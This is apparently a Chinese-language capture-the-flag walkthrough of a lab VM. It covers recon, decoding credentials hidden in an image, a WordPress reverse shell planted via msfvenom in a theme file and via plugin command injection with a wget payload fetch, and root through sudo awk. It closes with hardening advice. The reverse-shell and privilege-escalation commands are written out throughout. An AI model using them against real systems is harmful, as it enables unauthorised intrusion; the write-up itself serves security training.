本文為系列文章第三篇，難度為中級，本篇需要打開思維，如何利用已收集的信息拿到更多的信息，信息收集的能力是關鍵。在這里，你將會了解到圖片隱寫的技術，如何使用msfvenom(美少婦)生成木馬或是利用wordpress插件的命令執行漏洞，通過metasploit獲取目標主機的權限，之后使用linux中的awk進行提權。

1、信息收集：

1. 對目標進行端口掃描，探測開放的端口及應用，目標主機開放了22端口和80端口。

2. 從80端口（web服務）入手，進行目錄掃描，發現可用目錄/img和wordpress應用，訪問/img發現一張圖片，下載該圖片后，使用strings命令發現圖片中隱藏的關鍵信息(之后發現是目錄)，訪問新發現的目錄得到一串字符串，解密后得到一組用戶名密碼（為wordpress的用戶名密碼），進入wordpress后臺界面后使用msfvenom生成木馬上傳或者利用wordpress插件的命令執行漏洞，再通過metasploit獲取目標權限。

2、提權：

拿到服務器權限后一般是低權限賬號，那么就需要提權，本次通過linux的awk進行提權拿到root權限。

靶機難度：中級

靶機描述：

Flag: boot-root

Learing: exploit | web application Security | Privilege Escalation

Contact.. https://www.linkedin.com/in/rahulgehlaut/
This works betterin VirtualBox than VMware

靶機地址

靶機ip：192.168.1.106

Kaliip：192.168.1.104

用到的知識點、工具和漏洞：

• Nmap：一款開源的端口掃描器，用于端口掃描及服務識別

• Dirbuster：一款目錄掃描器，kali中自帶，用于目錄探測

• 圖片隱寫：將信息隱寫至圖片文件中的技術

• Metasploit：集成了大量攻擊腳本的安全框架，并固化了利用流程，kali中自帶

• Msfvenom：簡稱美少婦，用于生成木馬的工具，kali中自帶

• wordpress插件反彈shell：wordpress是一款國外免費開源的博客軟件和內容管理系統

01.信息收集

主機探測：netdiscover-i eth0 -r 192.168.1.0/24

端口探測及服務識別：nmap-sS -sV -T5 -A 192.168.1.106

當前靶機開放了22和80端口，首先以80的web服務為突破口。

Ofcourse 先掃波目錄，這里使用的kali自帶的dirbuster

/css和/html目錄下沒發現啥有用的信息，/img目錄下發現1個圖片，好明顯的的提示呀

打開看看，好像也沒啥有用的信息，先下載下來到本地，網上搜了下有種圖片隱寫的技術，可能有突破口。

使用strings命令查看一下，發現了疑似密碼的字符串，先記錄下。

剛才掃目錄還發現了wordpress,先用wpscan掃一波看看，掃出一個web用戶，于是嘗試用剛才的密碼去登錄下試試，沒啥用。看來那個不是密碼，那會是什么，肯定有什么作用。

各種嘗試，又試了一下url，果然是的，發現了新大陸呀，找到了flag2

打開一看似乎是某種加密，網上搜了一下是brainfuck

于是在網上找了brainfuck在線解碼網站，得到一對用戶名密碼

看來這就是wordpress的用戶名密碼了。（其實到這里已經可以走捷徑了，后面提權的時候才發現，這里可以直接使用ssh登錄進去）登錄進去后發現該用戶權限挺大的。

這里有兩種getshell的方式：

1.是通過Appearance下的themeeditor模塊添加php反彈shell的代碼，再用metasploist監聽獲取shell

2.是通過Activity monitor的命令執行漏洞反彈shell，這也是作者寫的walkthrough使用的方式。

我這里把兩種方式都試過了，均可getshell。接下來我來展示第1種方法，也是常規方法，在具有后臺管理權限時如何getshell。

首先進入到themeeditor目錄下

在右邊文件目錄下找1個php頁面填充反彈shell的代碼，我這里在404.php里填充，php代碼使用msfvenom生成

Msfvenom -p php/meterpreter/reverse_tcp  lhost=192.168.1.104 lport=1234 -oshell.php

這里lhost填寫的是kali的ip,之后metesploist的信息要與這里一致

將php代碼填充到404.php里，這里注意要將前面的/*去掉，不然代碼無法生效，之后點擊保存。

現在打開metasploit,準備反彈shell

然后網頁通過訪問

http://192.168.1.106/wordpress/wp-content/themes/twentynineteen/404.php即可反彈shell

拿到shell第1件事就是獲取一個標準shell，可通過以下命令獲取python-c import pty; pty.spawn("/bin/bash")

然后展示第2種反彈shell的方法，進入Activitymonitor目錄下有個Tools

確實可以存在命令執行，但該輸入框存在長度限制，這里使用瀏覽器修改前端參數繞過

然后使用wget下載php代碼，然后開啟metasploit監聽,網頁通過phpxxx.php執行php代碼反彈shell。

kali上使用python-m SimpleHTTPServer 80開啟臨時web服務，然后網頁上點擊lookup即可下載php代碼

使用之前Metasploit設置的參數繼續監聽

成功反彈shell,到此兩種方法都已演示完畢，如果有其他方法，大家可以一起交流

02.提權

下面需要進行提權，因為剛得到的shell權限較低,得想辦法獲取高權限賬戶,最終獲取root權限。

Cat/etc/passwd查看一下系統存在的用戶

發現一個用戶叫web,之前wordpress得到一組用戶名密碼就是web的，于是嘗試切換用戶，沒想到成功切換了。（做到這里發現，之前完全可以通過ssh直接登錄，也就省略了反彈shell的步驟，不過要不是湊巧賬戶密碼一樣也不能成功，所以這里說明賬號口令盡量不要設置成相同口令，然而事實上我們很多口令都是設成一樣的，警示！）

接下來看看home目錄下有啥東西，找到第三個flag

最后就是如何獲取root權限，有以下幾個思路

• Sudo -l 查詢具有sudo權限命令，然后提權

• SUID提權,find / -perm -u=s -type f 2>/dev/null

• 通過在/etc/passwd添加一個root權限的賬戶進行提權,

• find / -writable -type f 2>/dev/null 查找可利用的可寫文件

• 內核提權

這里使用sudo-l 查詢有哪些sudo權限命令

這里需通過awk提權

如此看來可以通過該命令提權

sudo/usr/bin/awk {system("/bin/bash")}

獲取最后一個flag

1. 對于存儲的用戶名密碼使用強加密算法

2. 不信任用戶的輸入，進行過濾或白名單校驗

3. 對于linux中的某些命令不要賦予sudo權限